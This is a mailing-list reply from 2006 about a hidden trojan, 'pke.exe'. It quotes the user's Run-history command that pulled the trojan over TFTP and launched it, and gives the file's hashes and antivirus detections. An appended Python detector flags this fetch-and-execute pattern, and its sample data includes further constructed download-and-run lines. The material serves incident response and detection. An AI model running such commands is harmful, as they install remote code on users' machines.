Date: Thu, 14 Dec 2006 23:46:14 -0500
Craig Lalley wrote:
> I generally keep a good eye on my computer.
>
> Today I noticed that network packets were leaving my PC, without my understanding why.
>
> I turned off all processes that could be communicating. I even looked at my McAfee firewall, but nothing was identified.
>
> My task manager showed no processes that were unknown.
>
> I found this in my run commands drop down box.
> %comspec% /c tftp -i 66.36.241.146 GET pke.exe & start pke
>
> So, I downloaded process explorer from www.sysinternals.com.
>
> And lo and behold, there was a hidden process pke, consuming 49% of the CPU (think hyperthreading). I was able to kill it, and find the offending program and remove it.
>
> Has anyone seen anything like this before?
All the time, being a security person at a university. The question would
be: how did it get there? Are you patched? Did you get the timestamps
of the file before you deleted it? Do you recall what you were doing at the time?
The IP belongs to HopOne, which is "a really bad neighborhood". The
file itself:
File size: 18964 bytes
MD5: 8e6f28e1257d7dc0aa94b7b69a8721ca
SHA1: cbfa37aeb293fbbe082b86f0b4c83f3c38f53436
packers: ASPACK
Antivirus    Version     Update      Result
AntiVir      7.3.0.15    12.14.2006  HEUR/Malware
BitDefender  7.2         12.15.2006  Generic.Malware.SYdld.228593FE
DrWeb        4.33        12.14.2006  BACKDOOR.Trojan
eSafe        7.0.14.0    12.14.2006  suspicious Trojan/Worm
Fortinet     2.82.0.0    12.15.2006  suspicious
Ikarus       T3.1.0.26   12.14.2006  Trojan-Spy.Win32.Delf.OR
NOD32v2      1922        12.14.2006  probably unknown NewHeur_PE virus
Not sure what it is, but it's not nice. I'll look into this one a bit;
I haven't seen it before, and it's not very well known based on the few
hits above.
Jeff
* To join/leave the list, search archives, change list settings, *
* etc., please visit http://raven.utc.edu/archives/hp3000-l.html *
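Added example (not from either message in the thread): a small Python detector for the download-and-execute pattern Craig found in his Run history. It strips a "cmd /c" or "%comspec% /c" prefix, splits the line on cmd.exe chain operators, and flags a TFTP GET whose fetched file is launched by a later stage of the same line. The sample command lines are constructed, apart from the one quoted above.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed sample command lines, as they might be recovered from a user's
# Run-dialog history or a process-creation log. Only the first is from the thread.
SAMPLE_COMMANDS = [
    "%comspec% /c tftp -i 66.36.241.146 GET pke.exe & start pke",
    "cmd.exe /c tftp -i 198.51.100.7 get svc.exe && svc.exe",
    "tftp -i 203.0.113.9 GET update.exe",
    "notepad.exe C:\\notes.txt",
    "tftp 192.0.2.5 PUT report.txt",
]

_SHELL_PREFIX_RE = re.compile(r"^\s*(?:%comspec%|cmd(?:\.exe)?)\s+/[ck]\s+", re.IGNORECASE)
_TFTP_RE = re.compile(r"^tftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>\S+)\s+(?P<verb>get|put)\s+(?P<file>\S+)",
                      re.IGNORECASE)

@dataclass
class TftpFinding:
    host: str       # remote TFTP server the file was pulled from
    payload: str    # file name requested with GET
    executed: bool  # True when a later stage of the same line launches that file

def split_chain(cmdline: str) -> list[str]:
    """Drop a leading 'cmd /c' or '%comspec% /c' and split on cmd.exe chain operators."""
    body = _SHELL_PREFIX_RE.sub("", cmdline)
    return [s.strip() for s in re.split(r"&&|\|\||&|\|", body) if s.strip()]

def _stem(name: str) -> str:
    # 'C:\tmp\pke.exe' -> 'pke', so both 'start pke' and 'pke.exe' match it later
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base

def analyze(cmdline: str) -> TftpFinding | None:
    """Report a TFTP GET in the line and whether the fetched file is then run."""
    stages = split_chain(cmdline)
    for idx, stage in enumerate(stages):
        m = _TFTP_RE.match(stage)
        if not m or m.group("verb").lower() != "get":
            continue
        launch = re.compile(r"^(?:start\s+)?(?:\S*[\\/])?" + re.escape(_stem(m.group("file")))
                            + r"(?:\.exe)?(?:\s|$)", re.IGNORECASE)
        executed = any(launch.match(s) for s in stages[idx + 1:])
        return TftpFinding(m.group("host"), m.group("file"), executed)
    return None

def scan(cmdlines: list[str]) -> list[tuple[str, TftpFinding]]:
    """Return (command line, finding) for every line that fetches a file over TFTP."""
    return [(c, f) for c in cmdlines if (f := analyze(c)) is not None]
```

Calling scan(SAMPLE_COMMANDS) yields three findings, two of them flagged as fetch-and-execute; the same check run over RunMRU entries or process-creation logs gives a quick triage signal for this kind of foothold.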